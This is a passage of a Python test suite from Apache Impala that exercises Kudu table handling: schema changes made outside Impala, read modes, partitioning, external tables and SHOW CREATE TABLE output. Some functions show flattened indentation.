    on read with outdated metadata (IMPALA-4828)."""
    cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
    cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING NULL)
        PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
    assert kudu_client.table_exists(
        KuduTestSuite.to_kudu_table_name(unique_database, "foo"))

    # Force metadata to be loaded on impalads
    cursor.execute("select * from %s.foo" % (unique_database))

    # Load the table via the Kudu client and re-create col 's' as NOT NULL.
    table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
    alterer = kudu_client.new_table_alterer(table)
    alterer.drop_column("s")
    table = alterer.alter()
    alterer = kudu_client.new_table_alterer(table)
    alterer.add_column("s", "string", nullable=False, default="bar")
    table = alterer.alter()

    # Add some rows
    session = kudu_client.new_session()
    for i in range(100):
      op = table.new_insert((i, "foo"))
      session.apply(op)
    session.flush()

    # Pin the snapshot so the scan sees the rows just flushed.
    cursor.execute("set kudu_snapshot_read_timestamp_micros=%s" %
                   to_unixtime_micros(kudu_client.latest_observed_timestamp()))

    # Scanning should result in an error
    try:
      cursor.execute("SELECT * FROM %s.foo" % (unique_database))
      assert cluster_properties.is_catalog_v2_cluster(),\
          "Should fail with Catalog V1, which caches metadata"
    except Exception as e:
      assert not cluster_properties.is_catalog_v2_cluster(),\
          "Should succeed with Catalog V2, which does not cache metadata"
      expected_error = "Column 's' is not nullable but Impala expected it to be "\
          "nullable. The table metadata in Impala may be outdated and need to be "\
          "refreshed."
      assert expected_error in str(e)

    # After a REFRESH the scan should succeed
    cursor.execute("REFRESH %s.foo" % (unique_database))
    cursor.execute("SELECT * FROM %s.foo" % (unique_database))
    assert len(cursor.fetchall()) == 100
def test_kudu_col_added(self, cursor, kudu_client, unique_database, cluster_properties):
  """Test adding a Kudu column outside of Impala.

  A column 'b' is added and a row written directly through the Kudu client;
  Catalog V2 sees the new column immediately, Catalog V1 only after REFRESH.
  """
  # Snapshot reads make the scan results below deterministic.
  cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
  cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY)
      PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
  assert kudu_client.table_exists(
      KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
  # Force metadata to be loaded on impalads
  cursor.execute("select * from %s.foo" % (unique_database))
  # Load the table via the Kudu client and add a new col
  table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
  alterer = kudu_client.new_table_alterer(table)
  alterer.add_column("b", "int32")
  table = alterer.alter()
  # Add some rows
  session = kudu_client.new_session()
  op = table.new_insert((0, 0))
  session.apply(op)
  session.flush()
  # Pin the snapshot so the row written through the Kudu client is visible.
  cursor.execute("set kudu_snapshot_read_timestamp_micros=%s" %
      to_unixtime_micros(kudu_client.latest_observed_timestamp()))
  cursor.execute("SELECT * FROM %s.foo" % (unique_database))
  if cluster_properties.is_catalog_v2_cluster():
    # Changes in Kudu should be immediately visible to Impala with Catalog V2.
    assert cursor.fetchall() == [(0, 0)]
  else:
    # Only the first col is visible to Impala. Impala will not know about the missing
    # column, so '*' is expanded to known columns. This doesn't have a separate check
    # because the query can proceed and checking would need to fetch metadata from the
    # Kudu master, which is what REFRESH is for.
    assert cursor.fetchall() == [(0, )]
    # After a REFRESH both cols should be visible
    cursor.execute("REFRESH %s.foo" % (unique_database))
    cursor.execute("SELECT * FROM %s.foo" % (unique_database))
    assert cursor.fetchall() == [(0, 0)]
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_kudu_col_removed(self, cursor, kudu_client, unique_database):
  """Test removing a Kudu column outside of Impala.

  Column 's' is dropped directly through the Kudu client; a scan with stale
  cached metadata should then fail, and succeed after REFRESH.
  """
  cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
  cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING)
      PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
  assert kudu_client.table_exists(
      KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
  # Force metadata to be loaded on impalads
  cursor.execute("select * from %s.foo" % (unique_database))
  cursor.execute("insert into %s.foo values (0, 'foo')" % (unique_database))
  # Load the table via the Kudu client and change col 's' to be a different type.
  table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
  alterer = kudu_client.new_table_alterer(table)
  alterer.drop_column("s")
  table = alterer.alter()
  # Scanning should result in an error
  # NOTE(review): if the scan unexpectedly succeeds, no assertion fires here —
  # presumably to tolerate clusters where the new schema is already visible
  # (e.g. Catalog V2); confirm this is intentional.
  try:
    cursor.execute("SELECT * FROM %s.foo" % (unique_database))
  except Exception as e:
    # The Kudu-side table name embeds unique_database, which is derived from this
    # test's name — presumably stable under the test fixture; verify if renamed.
    expected_error = "Column 's' not found in kudu table impala::test_kudu_col_removed"
    assert expected_error in str(e)
  # After a REFRESH the scan should succeed
  cursor.execute("REFRESH %s.foo" % (unique_database))
  cursor.execute("SELECT * FROM %s.foo" % (unique_database))
  assert cursor.fetchall() == [(0, )]
def test_kudu_show_unbounded_range_partition(self, cursor, kudu_client,
    unique_database):
  """Check that a single unbounded range partition gets printed correctly."""
  # Build a range-partitioned table directly via the Kudu client with no explicit
  # partitions, i.e. a single unbounded range partition.
  schema_builder = SchemaBuilder()
  column_spec = schema_builder.add_column("id", INT64)
  column_spec.nullable(False)
  schema_builder.set_primary_keys(["id"])
  schema = schema_builder.build()
  name = unique_database + ".unbounded_range_table"
  try:
    kudu_client.create_table(name, schema,
        partitioning=Partitioning().set_range_partition_columns(["id"]))
    kudu_table = kudu_client.table(name)
    impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
    props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
    cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
        props))
    with self.drop_impala_table_after_context(cursor, impala_table_name):
      cursor.execute("SHOW RANGE PARTITIONS %s" % impala_table_name)
      # Single STRING result column named after the range columns.
      assert cursor.description == [
          ('RANGE (id)', 'STRING', None, None, None, None, None)]
      assert cursor.fetchall() == [('UNBOUNDED',)]
  finally:
    # Clean up the Kudu-side table even if the Impala DDL failed.
    if kudu_client.table_exists(name):
      kudu_client.delete_table(name)
@SkipIfKudu.no_hybrid_clock
def test_column_storage_attributes(self, cursor, unique_database):
"""Tests that for every valid combination of column type, encoding, and compression,
we can insert a value and scan it back from Kudu."""
# This test takes about 2min and is unlikely to break, so only run it in exhaustive.
if self.exploration_strategy() != 'exhaustive':
pytest.skip("Only runs in exhaustive to reduce core time.")
table_name = "%s.storage_attrs" % unique_database
types = ['boolean', 'tinyint', 'smallint', 'int', 'bigint', 'float', 'double', \
'string', 'timestamp', 'decimal', 'date', 'varchar(10)']
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
create_query = "create table %s (id int primary key" % table_name
for t in types:
# We truncate the type attributes in the column name to keep things simple.
create_query += ", %s_col %s" % (t.split('(')[0], t)
create_query += ") partition by hash(id) partitions 16 stored as kudu"
cursor.execute(create_query)
encodings = ['AUTO_ENCODING', 'PLAIN_ENCODING', 'PREFIX_ENCODING', 'GROUP_VARINT', \
'RLE', 'DICT_ENCODING', 'BIT_SHUFFLE']
compressions = ['DEFAULT_COMPRESSION', 'NO_COMPRESSION', 'SNAPPY', 'LZ4', 'ZLIB']
i = 0
for e in encodings:
for c in compressions:
for t in types:
try:
# We truncate the type attributes in the column name to keep things simple.
cursor.execute("""alter table %s alter column %s_col
set encoding %s compression %s""" % (table_name, t.split('(')[0], e, c))
except Exception as err:
assert "encoding %s not supported for type" % e in str(err)
cursor.execute("""insert into %s values (%s, true, 0, 0, 0, 0, 0, 0, '0',
cast('2009-01-01' as timestamp), cast(0 as decimal),
cast('2010-01-01' as date), cast('' as varchar(10)))""" % (table_name, i))
cursor.execute("select * from %s where id = %s" % (table_name, i))
assert cursor.fetchall() == \
[(i, True, 0, 0, 0, 0, 0.0, 0.0, '0', datetime(2009, 1, 1, 0, 0), 0,
date(2010, 1, 1), '')]
i += 1
cursor.execute("select count(*) from %s" % table_name)
print cursor.fetchall() == [(i, )]
def test_concurrent_schema_change(self, cursor, unique_database):
  """Tests that an insert into a Kudu table with a concurrent schema change either
  succeeds or fails gracefully.

  An inserter thread races against the main thread, which repeatedly drops and
  re-adds 'col1' with alternating types; any insert error must match one of the
  known messages below.
  """
  table_name = "%s.test_schema_change" % unique_database
  cursor.execute("""create table %s (col0 bigint primary key, col1 bigint)
      partition by hash(col0) partitions 16 stored as kudu""" % table_name)

  iters = 5

  def insert_values():
    # Stash errors on the Thread object so the main thread can read them after
    # join().
    threading.current_thread().errors = []
    client = self.create_impala_client()
    for i in range(0, iters):
      time.sleep(random.random())  # sleeps for up to one second
      try:
        client.execute("insert into %s values (0, 0), (1, 1)" % table_name)
      except Exception as e:
        threading.current_thread().errors.append(e)

  insert_thread = threading.Thread(target=insert_values)
  insert_thread.start()

  # Concurrently drop and re-add col1, alternating its type so inserts can race
  # against an incompatible schema.
  for i in range(0, iters):
    time.sleep(random.random())  # sleeps for up to one second
    cursor.execute("alter table %s drop column col1" % table_name)
    if i % 2 == 0:
      cursor.execute("alter table %s add columns (col1 string)" % table_name)
    else:
      cursor.execute("alter table %s add columns (col1 bigint)" % table_name)

  insert_thread.join()

  for error in insert_thread.errors:
    msg = str(error)
    # The first two are AnalysisExceptions, the next two come from KuduTableSink::Open()
    # if the schema has changed since analysis, the rest come from the Kudu server if
    # the schema changes between KuduTableSink::Open() and when the write ops are sent.
    possible_errors = [
        "has fewer columns (1) than the SELECT / VALUES clause returns (2)",
        "(type: TINYINT) is not compatible with column 'col1' (type: STRING)",
        "has fewer columns than expected.",
        "Column col1 has unexpected type.",
        "Client provided column col1[int64 NULLABLE] not present in tablet",
        "Client provided column col1 INT64 NULLABLE not present in tablet",
        "The column 'col1' must have type string NULLABLE found int64 NULLABLE"
    ]
    assert any(err in msg for err in possible_errors)
def _retry_query(self, cursor, query, expected):
retries = 0
while retries < 3:
cursor.execute(query)
result = cursor.fetchall()
if result == expected:
break
retries += 1
time.sleep(1)
assert retries < 3, \
"Did not get a correct result for %s after 3 retries: %s" % (query, result)
def test_read_modes(self, cursor, unique_database):
  """Other Kudu tests are run with a scan level of READ_AT_SNAPSHOT to have predicable
  scan results. This test verifies that scans work as expected at the scan level of
  READ_LATEST by retrying the scan if the results are incorrect."""
  table_name = "%s.test_read_latest" % unique_database
  cursor.execute("set kudu_read_mode=READ_LATEST")
  cursor.execute("""create table %s (a int primary key, b string) partition by hash(a)
      partitions 8 stored as kudu""" % table_name)
  cursor.execute("insert into %s values (0, 'a'), (1, 'b'), (2, 'c')" % table_name)
  # READ_LATEST offers no snapshot consistency, so retry until the inserted rows
  # become visible.
  self._retry_query(cursor, "select * from %s order by a" % table_name,
      [(0, 'a'), (1, 'b'), (2, 'c')])
  cursor.execute("""insert into %s select id, string_col from functional.alltypes
      where id > 2 limit 100""" % table_name)
  # 3 rows from the literal insert plus 100 from the insert-select.
  self._retry_query(cursor, "select count(*) from %s" % table_name, [(103,)])
def test_replica_selection(self, cursor, unique_database):
"""This test verifies that scans work as expected with different replica selection.
"""
table_name = "%s.replica_selection" % unique_database
cursor.execute("""create table %s (a int primary key, b string) partition by hash(a)
partitions 8 stored as kudu""" % table_name)
cursor.execute("""insert into %s select id, string_col from functional.alltypes
limit 100""" % table_name)
cursor.execute("set kudu_replica_selection=LEADER_ONLY")
cursor.execute("select count(*) from %s" % table_name)
assert cursor.fetchall() == [(100,)]
cursor.execute("set kudu_replica_selection=CLOSEST_REPLICA")
cursor.execute("select count(*) from %s" % table_name)
assert cursor.fetchall() == [(100,)]
class TestKuduPartitioning(KuduTestSuite):
  """Tests that rows inserted through Impala's KuduPartitionExpr are spread
  evenly across the partitions of a hash-partitioned Kudu table."""

  @classmethod
  def add_test_dimensions(cls):
    super(TestKuduPartitioning, cls).add_test_dimensions()
    # Test both the interpreted and the codegen'd path.
    add_exec_option_dimension(cls, "disable_codegen", "0")
    extend_exec_option_dimension(cls, "disable_codegen", "1")

  def test_partitions_evenly_distributed(self, vector, cursor,
      kudu_client, unique_database):
    """Sanity check for KuduPartitionExpr. We insert numbers into a table and check that
    inserted elements are distributed evenly among the partitions. The assumption here is
    that the source distribution is more or less uniform and that hashing retains this
    property. This protects against some but not all errors. The number of partitions
    should be the same as the number of impalads."""
    table_name = "partitioning"
    table_full_name = unique_database + ".partitioning"
    cursor.execute("""CREATE TABLE %s (a INT PRIMARY KEY)
        PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % table_full_name)
    assert kudu_client.table_exists(KuduTestSuite.to_kudu_table_name(
        unique_database, table_name))
    query = "INSERT INTO %s SELECT id FROM functional.alltypes" % table_full_name
    # items() instead of the Python-2-only iteritems() so this also runs under
    # Python 3; dict() consumes either form identically.
    exec_options = dict((k, str(v)) for k, v
        in vector.get_value('exec_option').items())
    cursor.execute(query, configuration=exec_options)
    profile = cursor.get_profile()
    numbers = TestKuduPartitioning.extract_kudu_rows_from_profile(profile)
    TestKuduPartitioning.assert_rows_evenly_distributed(numbers)

  @staticmethod
  def assert_rows_evenly_distributed(rows):
    """Asserts every per-instance row count in 'rows' is within 10% of the
    averaged summary value, which is the first element."""
    TOLERANCE_RATIO = 0.1
    avg = rows[0]  # The first result is from the averaged summary.
    values = rows[1:]
    for value in values:
      abs_diff = abs(avg - value)
      ratio = float(abs_diff) / avg
      assert ratio < TOLERANCE_RATIO

  @staticmethod
  def extract_kudu_rows_from_profile(profile):
    """Returns the TotalNumRows counter values of every KuduTableSink section in
    'profile', in order of appearance."""
    # First we look for a header that contains "KuduTableSink", then under that we find
    # the number of rows.
    res = []
    kudu_table_sink = "KuduTableSink"
    # Raw string: in the original non-raw literal, '\(' is an invalid escape
    # sequence (DeprecationWarning on modern Pythons); the pattern is unchanged.
    total_num_rows_re = re.compile(r"TotalNumRows:.*\(([0-9]+)\)")
    within_kudu_table_sink_section = False
    for line in profile.splitlines():
      if within_kudu_table_sink_section:
        match = total_num_rows_re.search(line)
        if match:
          res.append(int(match.group(1)))
          within_kudu_table_sink_section = False
      else:
        if kudu_table_sink in line:
          within_kudu_table_sink_section = True
    return res
class TestCreateExternalTable(KuduTestSuite):
  """Tests for CREATE EXTERNAL TABLE ... STORED AS KUDU over tables created
  directly through the Kudu client."""

  @SkipIfKudu.hms_integration_enabled
  def test_external_timestamp_default_value(self, cursor, kudu_client, unique_database):
    """Checks that a Kudu table created outside Impala with a default value on a
    UNIXTIME_MICROS column can be loaded by Impala, and validates the DESCRIBE
    output is correct."""
    schema_builder = SchemaBuilder()
    column_spec = schema_builder.add_column("id", INT64)
    column_spec.nullable(False)
    column_spec = schema_builder.add_column("ts", UNIXTIME_MICROS)
    column_spec.default(datetime(2009, 1, 1, 0, 0, tzinfo=utc))
    schema_builder.set_primary_keys(["id"])
    schema = schema_builder.build()
    name = unique_database + ".tsdefault"
    try:
      kudu_client.create_table(name, schema,
          partitioning=Partitioning().set_range_partition_columns(["id"]))
      kudu_table = kudu_client.table(name)
      impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
      props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
      cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
          props))
      with self.drop_impala_table_after_context(cursor, impala_table_name):
        cursor.execute("DESCRIBE %s" % impala_table_name)
        table_desc = [[col.strip() if col else col for col in row] for row in cursor]
        # Pytest shows truncated output on failure, so print the details just in case.
        LOG.info(table_desc)
        # 1230768000000000 is 2009-01-01 00:00:00 UTC in microseconds.
        assert ["ts", "timestamp", "", "false", "true", "1230768000000000",
                "AUTO_ENCODING", "DEFAULT_COMPRESSION", "0"] in table_desc
    finally:
      if kudu_client.table_exists(name):
        kudu_client.delete_table(name)

  @SkipIfKudu.hms_integration_enabled
  def test_implicit_table_props(self, cursor, kudu_client):
    """Check that table properties added internally during table creation are as
    expected.
    """
    with self.temp_kudu_table(kudu_client, [STRING, INT8, BOOL], num_key_cols=2) \
        as kudu_table:
      impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
      props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
      cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
          props))
      with self.drop_impala_table_after_context(cursor, impala_table_name):
        cursor.execute("DESCRIBE FORMATTED %s" % impala_table_name)
        table_desc = [[col.strip() if col else col for col in row] for row in cursor]
        # Pytest shows truncated output on failure, so print the details just in case.
        LOG.info(table_desc)
        assert ["", "EXTERNAL", "TRUE"] in table_desc
        assert ["", "kudu.master_addresses", KUDU_MASTER_HOSTS] in table_desc
        assert ["", "kudu.table_name", kudu_table.name] in table_desc
        assert ["", "storage_handler", "org.apache.hadoop.hive.kudu.KuduStorageHandler"] \
            in table_desc

  @SkipIfKudu.hms_integration_enabled
  def test_col_types(self, cursor, kudu_client):
    """Check that a table can be created using all available column types."""
    # TODO: Add DECIMAL when the Kudu python client supports decimal
    kudu_types = [STRING, BOOL, DOUBLE, FLOAT, INT16, INT32, INT64, INT8]
    with self.temp_kudu_table(kudu_client, kudu_types) as kudu_table:
      impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
      props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
      cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
          props))
      with self.drop_impala_table_after_context(cursor, impala_table_name):
        cursor.execute("DESCRIBE %s" % impala_table_name)
        kudu_schema = kudu_table.schema
        # DESCRIBE rows and the Kudu schema list columns in the same order.
        for i, (col_name, col_type, _, _, _, _, _, _, _) in enumerate(cursor):
          kudu_col = kudu_schema[i]
          assert col_name == kudu_col.name
          assert col_type.upper() == \
              self.kudu_col_type_to_impala_col_type(kudu_col.type.type)

  @SkipIfKudu.hms_integration_enabled
  def test_unsupported_binary_col(self, cursor, kudu_client):
    """Check that external tables with BINARY columns fail gracefully.
    """
    with self.temp_kudu_table(kudu_client, [INT32, BINARY]) as kudu_table:
      impala_table_name = self.random_table_name()
      try:
        cursor.execute("""
            CREATE EXTERNAL TABLE %s
            STORED AS KUDU
            TBLPROPERTIES('kudu.table_name' = '%s')""" % (impala_table_name,
                kudu_table.name))
        assert False
      except Exception as e:
        assert "Kudu type 'binary' is not supported in Impala" in str(e)

  @SkipIfKudu.hms_integration_enabled
  def test_drop_external_table(self, cursor, kudu_client):
    """Check that dropping an external table only affects the catalog and does not delete
    the table in Kudu.
    """
    with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
      impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
      props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
      cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (impala_table_name,
          props))
      with self.drop_impala_table_after_context(cursor, impala_table_name):
        cursor.execute("SELECT COUNT(*) FROM %s" % impala_table_name)
        assert cursor.fetchall() == [(0, )]
      # The Impala table was dropped when the context above exited, so the query
      # must now fail to resolve while the Kudu-side table still exists.
      try:
        cursor.execute("SELECT COUNT(*) FROM %s" % impala_table_name)
        assert False
      except Exception as e:
        assert "Could not resolve table reference" in str(e)
      assert kudu_client.table_exists(kudu_table.name)

  @SkipIfKudu.hms_integration_enabled
  def test_explicit_name(self, cursor, kudu_client):
    """Check that a Kudu table can be specified using a table property."""
    with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
      table_name = self.random_table_name()
      cursor.execute("""
          CREATE EXTERNAL TABLE %s
          STORED AS KUDU
          TBLPROPERTIES('kudu.table_name' = '%s')""" % (table_name, kudu_table.name))
      with self.drop_impala_table_after_context(cursor, table_name):
        cursor.execute("SELECT * FROM %s" % table_name)
        assert len(cursor.fetchall()) == 0

  @SkipIfKudu.hms_integration_enabled
  def test_explicit_name_preference(self, cursor, kudu_client):
    """Check that the table name from a table property is used when a table of the
    implied name also exists.
    """
    with self.temp_kudu_table(kudu_client, [INT64]) as preferred_kudu_table:
      with self.temp_kudu_table(kudu_client, [INT8]) as other_kudu_table:
        impala_table_name = self.get_kudu_table_base_name(other_kudu_table.name)
        cursor.execute("""
            CREATE EXTERNAL TABLE %s
            STORED AS KUDU
            TBLPROPERTIES('kudu.table_name' = '%s')""" % (
                impala_table_name, preferred_kudu_table.name))
        with self.drop_impala_table_after_context(cursor, impala_table_name):
          cursor.execute("DESCRIBE %s" % impala_table_name)
          # 'bigint' proves the INT64 (preferred) table was loaded, not the INT8
          # table matching the implied name.
          assert cursor.fetchall() == \
              [("a", "bigint", "", "true", "false", "", "AUTO_ENCODING",
                "DEFAULT_COMPRESSION", "0")]

  @SkipIfKudu.hms_integration_enabled
  def test_explicit_name_doesnt_exist(self, cursor, kudu_client):
    """Check that creating an external table pointing at a nonexistent Kudu table
    fails with a clear error."""
    kudu_table_name = self.random_table_name()
    try:
      cursor.execute("""
          CREATE EXTERNAL TABLE %s
          STORED AS KUDU
          TBLPROPERTIES('kudu.table_name' = '%s')""" % (
              self.random_table_name(), kudu_table_name))
      assert False
    except Exception as e:
      assert "Table does not exist in Kudu: '%s'" % kudu_table_name in str(e)

  @SkipIfKudu.hms_integration_enabled
  def test_explicit_name_doesnt_exist_but_implicit_does(self, cursor, kudu_client):
    """Check that when an explicit table name is given but that table doesn't exist,
    there is no fall-through to an existing implicit table.
    """
    with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
      table_name = self.random_table_name()
      try:
        cursor.execute("""
            CREATE EXTERNAL TABLE %s
            STORED AS KUDU
            TBLPROPERTIES('kudu.table_name' = '%s')""" % (
                self.get_kudu_table_base_name(kudu_table.name), table_name))
        assert False
      except Exception as e:
        assert "Table does not exist in Kudu: '%s'" % table_name in str(e)

  @SkipIfKudu.no_hybrid_clock
  @SkipIfKudu.hms_integration_enabled
  def test_table_without_partitioning(self, cursor, kudu_client, unique_database):
    """Test a Kudu table created without partitioning (i.e. equivalent to a single
    unbounded partition). It is not possible to create such a table in Impala, but
    it can be created directly in Kudu and then loaded as an external table.
    Regression test for IMPALA-5154."""
    cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
    schema_builder = SchemaBuilder()
    column_spec = schema_builder.add_column("id", INT64)
    column_spec.nullable(False)
    schema_builder.set_primary_keys(["id"])
    schema = schema_builder.build()
    partitioning = Partitioning().set_range_partition_columns([])
    name = "%s.one_big_unbounded_partition" % unique_database
    try:
      kudu_client.create_table(name, schema, partitioning=partitioning)
      kudu_table = kudu_client.table(name)
      props = "TBLPROPERTIES('kudu.table_name'='%s')" % name
      cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (name, props))
      with self.drop_impala_table_after_context(cursor, name):
        cursor.execute("INSERT INTO %s VALUES (1), (2), (3)" % name)
        cursor.execute("SELECT COUNT(*) FROM %s" % name)
        assert cursor.fetchall() == [(3, )]
        # SHOW RANGE PARTITIONS is rejected because the table has no range
        # partitions at all.
        try:
          cursor.execute("SHOW RANGE PARTITIONS %s" % name)
          assert False
        except Exception as e:
          assert "AnalysisException: SHOW RANGE PARTITIONS requested but table does "\
              "not have range partitions" in str(e)
    finally:
      if kudu_client.table_exists(name):
        kudu_client.delete_table(name)

  @SkipIfKudu.no_hybrid_clock
  @SkipIfKudu.hms_integration_enabled
  def test_column_name_case(self, cursor, kudu_client, unique_database):
    """IMPALA-5286: Tests that an external Kudu table that was created with a column name
    containing upper case letters is handled correctly."""
    cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
    table_name = '%s.kudu_external_test' % unique_database
    if kudu_client.table_exists(table_name):
      kudu_client.delete_table(table_name)
    schema_builder = SchemaBuilder()
    key_col = 'Key'
    schema_builder.add_column(key_col, INT64).nullable(False).primary_key()
    schema = schema_builder.build()
    partitioning = Partitioning().set_range_partition_columns([key_col])\
        .add_range_partition([1], [10])
    try:
      kudu_client.create_table(table_name, schema, partitioning)
      props = "tblproperties('kudu.table_name' = '%s')" % table_name
      cursor.execute("create external table %s stored as kudu %s" % (table_name, props))
      # Perform a variety of operations on the table, deliberately varying the
      # case of the column name in each statement.
      cursor.execute("insert into %s (kEy) values (5), (1), (4)" % table_name)
      cursor.execute("select keY from %s where KeY %% 2 = 0" % table_name)
      assert cursor.fetchall() == [(4, )]
      cursor.execute("select * from %s order by kEY" % (table_name))
      assert cursor.fetchall() == [(1, ), (4, ), (5, )]
      # Do a join with a runtime filter targeting the column.
      cursor.execute("select count(*) from %s a, %s b where a.key = b.key" %
          (table_name, table_name))
      assert cursor.fetchall() == [(3, )]
      cursor.execute("alter table %s add range partition 11 < values < 20" % table_name)
      new_key = "KEY2"
      cursor.execute("alter table %s change KEy %s bigint" % (table_name, new_key))
      val_col = "vaL"
      cursor.execute("alter table %s add columns (%s bigint)" % (table_name, val_col))
      cursor.execute("describe %s" % table_name)
      results = cursor.fetchall()
      # 'describe' should print the column name in lower case.
      assert new_key.lower() in results[0]
      assert val_col.lower() in results[1]
      cursor.execute("alter table %s drop column Val" % table_name)
      cursor.execute("describe %s" % table_name)
      assert len(cursor.fetchall()) == 1
      cursor.execute("alter table %s drop range partition 11 < values < 20" % table_name)
    finally:
      if kudu_client.table_exists(table_name):
        kudu_client.delete_table(table_name)

  @SkipIfKudu.hms_integration_enabled
  def test_conflicting_column_name(self, cursor, kudu_client, unique_database):
    """IMPALA-5283: Tests that loading an external Kudu table that was created with column
    names that differ only in case results in an error."""
    table_name = '%s.kudu_external_test' % unique_database
    if kudu_client.table_exists(table_name):
      kudu_client.delete_table(table_name)
    schema_builder = SchemaBuilder()
    col0 = 'col'
    schema_builder.add_column(col0, INT64).nullable(False).primary_key()
    col1 = 'COL'
    schema_builder.add_column(col1, INT64)
    schema = schema_builder.build()
    partitioning = Partitioning().set_range_partition_columns([col0])\
        .add_range_partition([1], [10])
    try:
      kudu_client.create_table(table_name, schema, partitioning)
      props = "tblproperties('kudu.table_name' = '%s')" % table_name
      cursor.execute("create external table %s stored as kudu %s" % (table_name, props))
      # If the create succeeded, this AssertionError is caught below and its
      # message fails the substring check, failing the test as intended.
      assert False, 'create table should have resulted in an exception'
    except Exception as e:
      assert 'Error loading Kudu table: Impala does not support column names that ' \
          + 'differ only in casing' in str(e)
    finally:
      if kudu_client.table_exists(table_name):
        kudu_client.delete_table(table_name)
class TestShowCreateTable(KuduTestSuite):
# Default storage attributes Impala prints for a column with no explicit
# encoding/compression.
column_properties = "ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION"

def assert_show_create_equals(self, cursor, create_sql, show_create_sql,
    do_exact_match=False):
  """Executes 'create_sql' to create a table, then runs "SHOW CREATE TABLE" and checks
  that the output is the same as 'show_create_sql'. 'create_sql' and
  'show_create_sql' can be templates that can be used with str.format(). format()
  will be called with 'table' and 'db' as keyword args. Also, compares HMS-3 specific
  output due to HMS translation. If do_exact_match is True does not manipulate the
  output and compares exactly with the show_create_sql parameter.
  """
  format_args = {"table": self.random_table_name(), "db": cursor.conn.db_name}
  cursor.execute(create_sql.format(**format_args))
  cursor.execute("SHOW CREATE TABLE {table}".format(**format_args))
  output = cursor.fetchall()[0][0]
  if not do_exact_match and HIVE_MAJOR_VERSION > 2:
    # in case of HMS-3 all Kudu tables are translated to external tables with some
    # additional properties. This code below makes sure that we have the expected table
    # properties and the table is external
    # TODO we should move these tests to a query.test file so that we can have better
    # way to compare the output against different hive versions
    assert output.startswith("CREATE EXTERNAL TABLE")
    assert "TBLPROPERTIES ('external.table.purge'='TRUE', " in output
    # We have made sure that the output starts with CREATE EXTERNAL TABLE, now we can
    # change it to "CREATE TABLE" to make it easier to compare rest of the str
    output = output.replace("CREATE EXTERNAL TABLE", "CREATE TABLE")
    # We should also remove the additional tbl property external.table.purge so that we
    # can compare the rest of output
    output = output.replace("TBLPROPERTIES ('external.table.purge'='TRUE', ",
        "TBLPROPERTIES (")
  # dedent() lets the callers write the expected SQL indented inside their own
  # source; strip() drops the leading/trailing newlines of the templates.
  assert output == \
      textwrap.dedent(show_create_sql.format(**format_args)).strip()
@SkipIfKudu.hms_integration_enabled
def test_primary_key_and_distribution(self, cursor):
  """Verifies SHOW CREATE TABLE output for combinations of primary keys,
  hash/range partitioning, encodings, compressions, defaults, and comments."""
  # TODO: Add case with BLOCK_SIZE
  # Simple hash partitioning; NOT NULL is implied by PRIMARY KEY.
  self.assert_show_create_equals(cursor,
      """
      CREATE TABLE {table} (c INT PRIMARY KEY)
      PARTITION BY HASH (c) PARTITIONS 3 STORED AS KUDU""",
      """
      CREATE TABLE {db}.{{table}} (
        c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
        PRIMARY KEY (c)
      )
      PARTITION BY HASH (c) PARTITIONS 3
      STORED AS KUDU
      TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
          db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
  # Range partition bounds are elided as "(...)" in the output.
  self.assert_show_create_equals(cursor,
      """
      CREATE TABLE {table} (c INT PRIMARY KEY, d STRING NULL)
      PARTITION BY HASH (c) PARTITIONS 3, RANGE (c)
      (PARTITION VALUES <= 1, PARTITION 1 < VALUES <= 2,
      PARTITION 2 < VALUES) STORED AS KUDU""",
      """
      CREATE TABLE {db}.{{table}} (
        c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
        d STRING NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
        PRIMARY KEY (c)
      )
